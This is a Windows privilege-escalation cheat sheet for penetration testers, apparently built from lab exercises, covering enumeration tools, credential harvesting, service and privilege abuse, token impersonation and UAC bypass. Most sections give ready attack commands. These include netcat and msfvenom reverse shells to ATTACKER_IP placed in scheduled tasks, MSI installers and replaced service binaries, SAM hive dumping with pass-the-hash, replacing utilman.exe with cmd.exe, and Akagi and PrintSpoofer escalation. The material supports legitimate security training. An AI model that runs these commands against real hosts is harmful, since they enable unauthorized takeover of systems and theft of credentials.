Skip to content

Windows Users

Types: - Administrators: They can change any system configuration parameter and access any file in the system. - Standard Users: These users can not make permanent or essential changes to the system and are limited to their files.

Any user with administrative privileges will be part of the Administrators group. On the other hand, standard users are part of the Users group.

There are also some special built-in accounts used by the operating system in the context of privilege escalation: - SYSTEM/LocalSystem: An account used by the operating system to perform internal tasks. It has full access to all files and resources available on the host with even higher privileges than administrators. - Local Service: Default account used to run Windows services with "minimum" privileges. It will use anonymous connections over the network. - Network Service: Default account used to run Windows services with "minimum" privileges. It will use the computer credentials to authenticate through the network.

Windows Password Hashes

The Windows OS stores hashed user account passwords locally in the SAM (Security Accounts Manager) database. This database is responsible for managing user accounts and passwords on Windows. The SAM database cannot be copied while the operating system is running.

As a result, attackers typically use in-memory techniques and tools to dump SAM hashes from the LSASS process.

Elevated privileges are needed to access and interact with the LSASS process.

Authentication and verification of user credentials is facilitated by the Local Security Authority (LSA).

Windows versions up to Windows Server 2003 use two different types of hashes: - LM: it is the default hashing algorithm that was implemented in Windows operating systems prior to NT4.0. - It splits the password into two seven-character chunks. - It converts them into uppercase. - It encrypts them separately using the DES algorithm.

  • NTLM: it is a collection of authentication protocols that are used in Windows to facilitate authentication between computers.
  • It uses MD4 hashing algorithm.
  • It does not split the hash into two chunks.
  • It's case sensitive.
  • It allows the use of symbols and unicode characters.

Windows disables LS hashing and uses NTLM hashing from Windows Vista onwards.

Windows Privilege Escalation

Scripts And Tools

WinPEAS

WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths.

PrivescCheck

PrivescCheck is a PowerShell script that searches common privilege escalation on the target system. It provides an alternative to WinPEAS without requiring the execution of a binary file.

To run PrivescCheck on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can use the Set-ExecutionPolicy cmdlet: Set-ExecutionPolicy Bypass -Scope process -Force.

WES-NG: Windows Exploit Suggester - Next Generation

WES-NG is a Python script based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.

# Run systeminfo in the target machine and redirect the output to a txt file
systeminfo > systeminfo.txt

# In the attacker machine run
wes.py systeminfo.txt

Windows Exploit Suggester

GitHub Repository

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

# Run systeminfo command on the target system and store the output to a file

./windows-exploit-suggester.py --update

./windows-exploit-suggester.py --database DB-xls --systeminfo SYSTEMINFO_FILE.txt

Metasploit module: post/multi/recon/local_exploit_suggester

It enumerates all vulnerabilities for a specific target.

use post/multi/recon/local_exploit_suggester
set SESSION SESSION_ID
run

Harvesting Passwords

Unattended Windows Installations

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction.

Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml

Passwords can be Base64-encoded.

Decode Base64 data using PowerShell:

$password='PASS_VALUE'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($pa
ssword))
echo $password

Once password is retrieved the psexec.py utility can be used to log in to the target as an administrator.

Powershell History

Read Powershell history file:

# cmd
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

# ps
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

# List saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:admin cmd.exe

IIS Configuration

The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms.

web.config can be found in one of the following locations:

  • C:\inetpub\wwwroot\web.config
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# Find database connection strings into a file
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.

PowerUp.ps1

PowerUp aims to be a clearing house of common Windows privilege escalation vectors that rely on misconfigurations. This can be used to locate any Unattended Windows Setup configuration file left on the system.

Usage:

powershell -ep bypass (PowerShell execution policy bypass)
.\PowerUp.ps1
Invoke-PrivescAudit

Scheduled Tasks

Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.

# List scheduled tasks
schtasks

# List detailed information for a task
schtasks /query /tn TASK_NAME /fo list /v
# Check the "Task To Run" and "Run As User" parameters.

# Check files permissions
icacls c:\tasks\schtask.bat

# Modify a bat file to spawn a reverse shell
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT > C:\tasks\schtask.bat

# Set up the listener and wait for the scheduled task to be triggered

# Trigger a task (this is uncommon in a real scenario)
schtasks /run /tn TASK_NAME

AlwaysInstallElevated

Windows installer files (.msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.

# This method requires two registry values to be set
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

# Once set, generate a malicious .msi file
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f msi -o malicious.msi

# Transfer and run the installer with the command below and receive the reverse shell
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.

Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started.

# Check specific service
sc qc SERVICE_NAME

The associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown on the SERVICE_START_NAME parameter.

All of the services configurations are stored on the registry under HKLM\SYSTEM\CurrentControlSet\Services\.

Insecure Permissions on Service Executable

If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.

Example: Splinterware System Scheduler Vulnerability

sc qc WindowsScheduler

# Check permissions on the executable associated with this service
icacls C:\PROGRA~2\SYSTEM~1\WService.exe

# Generate a msfvenom payload and replace the service with the generated executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe-service -o rev-svc.exe
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

# Restart the service
sc stop windowsscheduler
sc start windowsscheduler

Unquoted Service Paths

When working with Windows services, a very particular behavior occurs when the service is configured to point to an "unquoted" executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command.

Example: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:

  1. First, search for C:\\MyPrograms\\Disk.exe. If it exists, the service will run this executable.
  2. If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter.exe. If it exists, the service will run this executable.
  3. If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.

If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable. However, most of the service executables will be installed under C:\Program Files or C:\Program Files (x86) by default, which isn't writable by unprivileged users.

Insecure Service Permissions

If the service DACL (not the service's executable DACL) allow you to modify the configuration of a service, you will be able to reconfigure the service.

accesschk64.exe -qlc thmservice

If BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, it means any user can reconfigure the service.

# Generate a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe-service -o rev-svc3.exe

# Grant permissions to Everyone to execute the payload
icacls C:\rev-svc3.exe /grant Everyone:F

# Change the service's associated executable and account
sc config THMService binPath= "C:\rev-svc3.exe" obj= LocalSystem

# Restart the service
sc stop THMService
sc start THMService

Abusing Unpatched Software

You can use the wmic tool to list software installed on the target system and its versions.

wmic product get name,version,vendor

Remember that the wmic product command may not return all installed programs. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.

Add Account To Administrators Group

net user <username> <password> /add

net localgroup administrators <username> /add

Abusing Dangerous Privileges

Check privileges: whoami /priv.

A comprehensive list of exploitable privileges can be found ot the Priv2Admin Github project.

SeBackup/SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.

Having this power, an attacker can trivially escalate privileges on the system by using many techniques. For example, copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.

By default, the "Backup Operators" group is granted the SeBackup and SeRestore privileges.

# List privileges
whoami /priv

# Restore SAM and SYSTEM hashes
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

# Dump hashes wiht Impacket
python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

# Use the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges
python3 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP

SeTakeOwnership

The SeTakeOwnership** privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.

We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen. Since Utilman is run with SYSTEM privileges, we will gain SYSTEM privileges if we replace the original binary for any payload we like. As we can take ownership of any file, replacing it is trivial.

takeown /f C:\Windows\System32\Utilman.exe

Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need.

# Give user full permissions over utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant USER:F

# After this, we will replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe

Finally, lock the from the start button and click on the "Ease of Access" button, which runs utilman.exe with SYSTEM privileges. Since it was replaced with a cmd.exe copy, we will get a command prompt with SYSTEM privileges.

SeImpersonate/SeAssignPrimaryToken: Token Impersonation

These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.

As attackers, if we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.

Windows are sorted based on the varying security levels assigned to them: - Impersonate-level tokens are created as a direct result of a non-interactive login on Windows. They can be used to impersonate a token on the local system and not on external systems. - Delegate-level tokens are created through an interactive login on Windows. They can be used to impersonate tokens on any system.

The following privileges are required for a successful impersonation attack: - SeAssignPrimaryToken: it allows a user to impersonate a token. - SeCreateToken: it allows a user to create an arbitrary token with admin privileges. - SeImpersonatePrivilege: it allows a user to create a process under the security context of another user, usually with admin privileges.

In Windows systems, you will find that the LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs. Internet Information Services (IIS) will also create a similar default account called iis apppool\defaultapppool for web applications.

To elevate privileges using such accounts, an attacker needs the following: 1. To spawn a process so that users can connect and authenticate to it for impersonation to occur. 2. Find a way to force privileged users to connect and authenticate to the spawned malicious process.

Token Impersonation With Incognito

Incognito can be used to display a list of available tokens that can be impersonated.

SeImpersonatePrivilege privilege is needed to use Incognito module to escalate privileges.

# Load Incognito module
load incognito

# List user access tokens
list_tokens -u

impersonate_token "TOKEN_NAME"

# Migrate to explorer.exe
migrate EXPLORER_PID

Kernel Exploitation

Kernel exploits on Windows typically target vulnerabilities in the Windows kernel to execute arbitrary code to run privileged system commands or to obtain a system shell.

Windows Kernel Exploits Repository: GitHub Repository

UAC Bypass

Bypassing UAC With UACMe

UAC is used to ensure that changes to the operating system require approval from the administrator or a user account that is part of the local administrator group.

To bypass UAC, we need to have access to a user account that is part of the local administrator group on the target system.

UACMe it is a tool that can be used to bypass Windows UAC by leveraging techniques.

This repository has over 60 exploits that can be used to bypass UAC depending on the version of Windows running on the target system.

In order to elevate privileges by bypassing UAC, you will need access to a user that is a member of the local administrators group.

net localgroup administrators

UACMe usage

# Generate the meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe > shell.exe

# Set up listener
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run

# Navigate to the Temp directory
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload shell.exe
upload Akagi64.exe

# Bypass UAC using method 23 of Akagi. It executes the shell.exe file with elevated privileges
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\shell.exe

# Migrate to a process with NT AUTHORITY privileges

Bypassing UAC With Metasploit

UAC is a Windows security features that prevents unauthorized changes from being made to the operating system.

Windows Escalate UAC Protection Bypass can be used to bypass UAC by using trusted published certificate through process injection.

It is needed to have a running 64bit Meterpreter session.

Once a 64bit Meterpreter session is established:

use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set SESSION SESSION_ID
set LPORT ATTACKER_PORT
set TARGET Windows\ x64
run

Once the module is successfully run, privileges can be escalated using the getsystem command.

PrintSpoofer

PrintSpoofer: From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

# Spawn system cmd
PrintSpoofer.exe -i -c cmd

PrintSpoofer.exe -c "C:\TOOLS\nc.exe ATTACKER_IP ATTACKER_PORT -e cmd"